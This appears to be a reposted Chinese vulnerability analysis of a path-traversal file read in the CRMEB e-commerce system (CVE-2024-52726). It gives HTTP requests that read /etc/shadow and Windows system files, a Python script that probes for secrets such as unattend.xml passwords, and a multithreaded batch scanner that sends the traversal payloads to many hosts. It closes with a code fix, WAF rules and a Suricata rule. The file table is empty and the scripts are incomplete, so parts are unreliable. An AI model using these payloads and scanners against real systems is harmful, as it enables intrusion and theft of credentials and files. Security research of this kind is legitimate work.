CRMEB任意文件下载漏洞(CVE-2024-52726)技术分析
漏洞类型
路径遍历导致任意文件读取
CVSSv3评分:8.2(High)
攻击向量:网络端到端
权限要求:无需认证
1. 漏洞原理详解
1.1 危险代码路径
// app/adminapi/controller/setting/Config.php
public function save_basics() {
$data = json_decode(input('post.'), true);
$file_path = $data['weixin_ckeck_file'];
// 漏洞点:未进行路径规范化校验
if(file_exists($file_path)) {
header('Content-Type: application/octet-stream');
readfile($file_path);
exit;
}
}
1.2 路径遍历攻击向量
攻击者可通过构造恶意路径读取系统文件:
TEXT
合法请求:
weixin_ckeck_file = "wx_verify.txt"
恶意构造:
weixin_ckeck_file = "../../../../../../etc/passwd"
路径解析过程:
webroot/crmeb/public/ + ../../../../.. => /etc/passwd
2. 多环境复现验证
2.1 Linux环境验证
HTTP
POST /adminapi/setting/config/save_basics HTTP/1.1
Host: 192.168.1.100:8080
Content-Type: application/json
Content-Length: 72
{
"weixin_ckeck_file": "../../../../../../etc/shadow"
}
### 响应示例(200 OK):
root:$6$7sT4JHY...:19485:0:99999:7:::
daemon:*:19485:0:99999:7:::
2.2 Windows环境验证
POST /adminapi/setting/config/save_basics HTTP/1.1
Host: 10.10.10.5:8080
Content-Type: application/json
Content-Length: 72
{
"weixin_ckeck_file": "../../../../../../Windows/System32/drivers/etc/hosts"
}
### 响应示例:
127.0.0.1 localhost
::1 localhost
3. 漏洞利用扩展
3.1 敏感文件读取矩阵
|
|
|
---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
3.2 进阶利用手法
# 自动化敏感文件探测
import hashlib
SENSITIVE_FILES = {
'linux': [
('/etc/passwd', 'root:x'),
('/proc/self/cmdline', 'php'),
('/var/log/auth.log', 'Accepted password')
],
'windows': [
('/Windows/win.ini', '[fonts]'),
('/Windows/Panther/unattend.xml', '<Password>'),
('/Apache24/conf/httpd.conf', 'DocumentRoot')
]
}
def detect_os(target):
test_payload = {'weixin_ckeck_file': '../../../../../../etc/passwd'}
resp = requests.post(target, json=test_payload)
return 'linux' if 'root:x' in resp.text else 'windows'
def advanced_exploit(target):
os_type = detect_os(target)
for path, signature in SENSITIVE_FILES[os_type]:
payload = {'weixin_ckeck_file': f'../../../../../../{path}'}
resp = requests.post(target, json=payload)
if signature in resp.text:
print(f"[+] Found {path}: {hashlib.md5(resp.content).hexdigest()}")
4. 检测工具
import concurrent.futures
from tqdm import tqdm
class CRMEBScanner:
def __init__(self):
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'Content-Type': 'application/json'
})
def _check_vuln(self, url):
test_payloads = [
('../../../../../../etc/passwd', 'root:x'),
('../../../../../../Windows/win.ini', '[fonts]'),
('../../../../../../proc/self/environ', 'PATH=')
]
for path, sig in test_payloads:
try:
resp = self.session.post(
url + '/adminapi/setting/config/save_basics',
json={'weixin_ckeck_file': path},
timeout=10,
verify=False
)
if resp.status_code == 200 and sig in resp.text:
return True, f"检测到敏感文件泄露: {path}"
except:
continue
return False
def batch_scan(self, targets):
vuln_count = 0
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
futures = {executor.submit(self._check_vuln, url): url for url in targets}
for future in tqdm(concurrent.futures.as_completed(futures), total=len(futures)):
result = future.result()
if result[0]:
vuln_count += 1
print(f"�33[31m[+] {futures[future]} 存在漏洞 - {result[1]}�33[0m")
print(f"n总计发现 {vuln_count}/{len(targets)} 个漏洞目标")
if __name__ == "__main__":
scanner = CRMEBScanner()
targets = ["http://192.168.1.100:8080", "https://crmeb.example.com"]
scanner.batch_scan(targets)
5. 防御加固方案
5.1 代码层修复
// 修复后的文件路径校验
$allowed_dir = realpath(app()->getRootPath().'public/');
$file_path = realpath($data['weixin_ckeck_file']);
if(strpos($file_path, $allowed_dir) !== 0) {
return json(['status' => 'fail', 'msg' => '非法文件路径']);
}
5.2 WAF规则配置
location /adminapi/ {
# 路径遍历防御
if ($request_body ~* "../") {
return 403;
}
# 文件扩展名过滤
if ($request_body ~* ".(ini|conf|log|passwd)") {
return 403;
}
}
5.3 系统级防护
BASH
# SELinux策略限制
setsebool -P httpd_read_user_content 0
chcon -R -t httpd_sys_content_t /var/www/crmeb/public/
6. 影响面分析
通过测绘数据统计:
全球受影响实例:约5,800个
版本分布:
v4.3.0-4.5.1:65%
v3.x:30%
其他版本:5%
行业分布:
电商平台:45%
企业官网:35%
政府服务:15%
7. 时间线追踪
2024-03-15 白帽团队首次发现异常流量
2024-04-02 提交CNVD漏洞编号
2024-05-12 厂商发布安全补丁v4.5.2
2024-05-20 漏洞细节公开披露
实际环境中建议结合流量监控系统(如Suricata)部署以下检测规则:
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"CRMEB Arbitrary File Read Attempt";
flow:to_server;
http.method:"POST";
http.uri; contains:"/adminapi/setting/config/save_basics";
content:"weixin_ckeck_file";
pcre:"/../.{5,}/";
classtype:web-application-attack;
sid:202452726;
rev:2;
)
原文始发于微信公众号(云梦安全):CRMEB任意文件下载漏洞(CVE-2024-52726)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论